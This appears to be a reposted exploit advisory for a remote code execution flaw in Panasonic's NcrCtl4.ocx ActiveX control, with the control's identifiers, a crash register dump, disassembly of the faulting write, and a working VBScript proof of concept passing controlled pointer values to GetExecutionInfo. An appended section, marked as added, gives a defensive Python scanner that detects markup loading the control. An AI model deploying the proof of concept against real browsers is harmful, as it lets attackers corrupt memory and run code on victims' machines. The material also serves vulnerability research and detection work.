Panasonic Network Camera Recorder with Viewer Software Lite ActiveX remote code execution

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
File: NcrCtl4.ocx
GUID: {72DA075F-F92E-46B7-9EA5-4C144415AB50}
progID: NcrCtl4.NcrNet.1
Des.: CNcrNet Object
Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPersist Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data

CPU - thread 9. (00000C28), module NcrCtl4_ocx
EAX 41414141
ECX 00000000
EDX 00067932
EBX 00067932
EBP 41414141
ESI 029D4FA8
EDI 77124920 OLEAUT32.VariantClear
EIP 1008D2F0 NcrCtl4_ocx.1008D2F0

CPU Disasm
Address   Hex dump          Command                                  Comments
1008D2D0  /> \56            PUSH ESI
1008D2D1  |.  8B7424 08     MOV ESI,DWORD PTR SS:[ARG.1]
1008D2D5  |.  81C6 68010000 ADD ESI,168
1008D2DB  |.  56            PUSH ESI                                 
1008D2DC  |.  FF15 50E11210 CALL DWORD PTR DS:[<&KERNEL32.EnterCriti 
1008D2E2  |.  8B0D B89F1B10 MOV ECX,DWORD PTR DS:[101B9FB8]
1008D2E8  |.  8B4424 0C     MOV EAX,DWORD PTR SS:[ARG.2]
1008D2EC  |.  8B5424 10     MOV EDX,DWORD PTR SS:[ARG.3]
1008D2F0  |.  8908          MOV DWORD PTR DS:[EAX],ECX               ; <- ACCESS VIOLATION WRITING TO
1008D2F2  |.  A1 BC9F1B10   MOV EAX,DWORD PTR DS:[101B9FBC]
1008D2F7  |.  8B4C24 14     MOV ECX,DWORD PTR SS:[ARG.4]
1008D2FB  |.  8902          MOV DWORD PTR DS:[EDX],EAX
1008D2FD  |.  8B15 C09F1B10 MOV EDX,DWORD PTR DS:[101B9FC0]
1008D303  |.  56            PUSH ESI                                 
1008D304  |.  8911          MOV DWORD PTR DS:[ECX],EDX               
1008D306  |.  FF15 54E11210 CALL DWORD PTR DS:[<&KERNEL32.LeaveCriti 
1008D30C  |.  33C0          XOR EAX,EAX
1008D30E  |.  5E            POP ESI
1008D30F  \.  C2 1000       RETN 10
Proof of concept:

 <object classid='clsid:72DA075F-F92E-46B7-9EA5-4C144415AB50' id='test'></object>
 <script language='vbscript'>
  test.GetExecutionInfo 1094795585, 424242, 434343
 </script>
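
Added example, not part of the original advisory: a defender-side scan of captured HTML for markup that loads this control by the CLSID or progID listed above, decoding integer arguments passed to GetExecutionInfo into 32-bit hex so they can be compared with a crash dump. The names scan and decode_arg and the SAMPLE markup are constructed for this illustration.

```python
import re

# Identifiers taken from the advisory text above.
CLSID = "72DA075F-F92E-46B7-9EA5-4C144415AB50"
PROGID = "NcrCtl4.NcrNet.1"
METHOD = "GetExecutionInfo"

CLSID_RE = re.compile(r"clsid:\s*\{?" + re.escape(CLSID), re.I)
PROGID_RE = re.compile(r"[\"']" + re.escape(PROGID) + r"[\"']", re.I)
# VBScript allows `obj.Method a, b`; JScript requires `obj.Method(a, b)`.
CALL_RE = re.compile(r"\." + METHOD + r"[ \t]*\(?[ \t]*([^)\r\n]*)", re.I)
INT_RE = re.compile(r"^(?:&H([0-9A-F]+)|0x([0-9A-F]+)|(-?\d+))$", re.I)


def decode_arg(token):
    """Return an integer literal as 32-bit hex, or None if it is not a literal."""
    m = INT_RE.match(token.strip())
    if not m:
        return None
    hex_digits = m.group(1) or m.group(2)
    value = int(hex_digits, 16) if hex_digits else int(m.group(3))
    return "0x%08X" % (value & 0xFFFFFFFF)


def scan(html):
    """Report whether markup loads the control and how it calls METHOD."""
    calls = []
    for m in CALL_RE.finditer(html):
        args = [a.strip() for a in m.group(1).split(",") if a.strip()]
        calls.append([decode_arg(a) or a for a in args])
    loads = bool(CLSID_RE.search(html) or PROGID_RE.search(html))
    return {"loads_control": loads, "calls": calls}


# Constructed sample: the same markup shape and arguments as the advisory's
# proof of concept, embedded here so the scan runs offline.
SAMPLE = """<object classid='clsid:72DA075F-F92E-46B7-9EA5-4C144415AB50' id='test'></object>
<script language='vbscript'>
test.GetExecutionInfo 1094795585, 424242, 434343
</script>"""

if __name__ == "__main__":
    print(scan(SAMPLE))
```

On the sample, the first two arguments decode to 0x41414141 and 0x00067932, the values held in EAX and EDX in the register dump, which the instructions at 1008D2F0 and 1008D2FB use as write destinations.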